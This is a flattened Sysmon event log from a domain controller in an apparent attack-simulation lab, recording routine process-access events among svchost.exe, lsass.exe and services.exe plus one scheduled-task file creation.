08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localT10532020-10-12 08:41:06.059{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 10341000x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1500-000000007F01}1324C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 